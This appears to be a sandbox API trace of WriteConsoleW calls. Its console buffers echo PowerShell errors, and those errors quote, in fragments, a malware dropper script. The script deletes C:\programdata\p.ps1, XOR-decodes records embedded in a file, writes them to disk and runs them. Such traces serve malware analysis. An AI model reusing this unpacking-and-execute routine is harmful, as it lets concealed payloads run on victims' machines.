WriteConsoleW
|
buffer:
Remove-Item : Cannot find path 'C:\programdata\p.ps1' because it does not exist
console_handle:
0x00000023
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At line:1 char:12
console_handle:
0x0000003b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ Remove-Item <<<< 'c:\\programdata\\p.ps1';$f = gc $m -Encoding Byte; $fSize
console_handle:
0x00000047
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
= $f.count;$i=$o; while($i -lt $fSize){$bXor=$f[$i];$flag=$f[$i+1];$dwPathLen=[
console_handle:
0x00000053
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
bitconverter]::ToInt32($f, $i+2);$dwDataLen=[bitconverter]::ToInt32($f, $i+6);$
console_handle:
0x0000005f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
fi=10; if($flag -eq 2){$i=$i+$fi+$dwPathLen+$dwDataLen;continue;};if($bXor -ne
console_handle:
0x0000006b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
0){for([int]$p=$i+$fi; $p -lt ($i + $fi +$dwPathLen + $dwDataLen); $p++){ $f[$p
console_handle:
0x00000077
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
] = $f[$p] -bxor $bXor}};[byte[]]$pathHex = $f[($i+$fi)..($i+$fi+$dwPathLen-1)]
console_handle:
0x00000083
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
;$path = [System.Text.Encoding]::ASCII.GetString($f[($i+$fi)..($i+$fi+$dwPathLe
console_handle:
0x0000008f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
n-2)]); sc $path ([byte[]]($f | select -Skip ($i+$fi+$dwPathLen) | select -Skip
console_handle:
0x0000009b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Last ($fSize-$i-$fi-$dwPathLen-$dwDataLen))) -Encoding Byte;if($flag){&$path;}$
console_handle:
0x000000a7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
i=$i+$fi+$dwPathLen+$dwDataLen;}
console_handle:
0x000000b3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (C:\programdata\p.ps1:String) [R
console_handle:
0x000000bf
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
emove-Item], ItemNotFoundException
console_handle:
0x000000cb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.Remov
console_handle:
0x000000d7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
eItemCommand
console_handle:
0x000000e3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Get-Content : Cannot bind argument to parameter 'Path' because it is null.
console_handle:
0x00000103
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At line:1 char:45
console_handle:
0x0000010f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ Remove-Item 'c:\\programdata\\p.ps1';$f = gc <<<< $m -Encoding Byte; $fSize
console_handle:
0x0000011b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
= $f.count;$i=$o; while($i -lt $fSize){$bXor=$f[$i];$flag=$f[$i+1];$dwPathLen=[
console_handle:
0x00000127
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
bitconverter]::ToInt32($f, $i+2);$dwDataLen=[bitconverter]::ToInt32($f, $i+6);$
console_handle:
0x00000133
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
fi=10; if($flag -eq 2){$i=$i+$fi+$dwPathLen+$dwDataLen;continue;};if($bXor -ne
console_handle:
0x0000013f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
0){for([int]$p=$i+$fi; $p -lt ($i + $fi +$dwPathLen + $dwDataLen); $p++){ $f[$p
console_handle:
0x0000014b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
] = $f[$p] -bxor $bXor}};[byte[]]$pathHex = $f[($i+$fi)..($i+$fi+$dwPathLen-1)]
console_handle:
0x00000157
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
;$path = [System.Text.Encoding]::ASCII.GetString($f[($i+$fi)..($i+$fi+$dwPathLe
console_handle:
0x00000163
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
n-2)]); sc $path ([byte[]]($f | select -Skip ($i+$fi+$dwPathLen) | select -Skip
console_handle:
0x0000016f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Last ($fSize-$i-$fi-$dwPathLen-$dwDataLen))) -Encoding Byte;if($flag){&$path;}$
console_handle:
0x0000017b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
i=$i+$fi+$dwPathLen+$dwDataLen;}
console_handle:
0x00000187
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidData: (:) [Get-Content], ParameterBinding
console_handle:
0x00000193
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ValidationException
console_handle:
0x0000019f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,M
console_handle:
0x000001ab
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
icrosoft.PowerShell.Commands.GetContentCommand
console_handle:
0x000001b7
|
1
|
1 |
0
|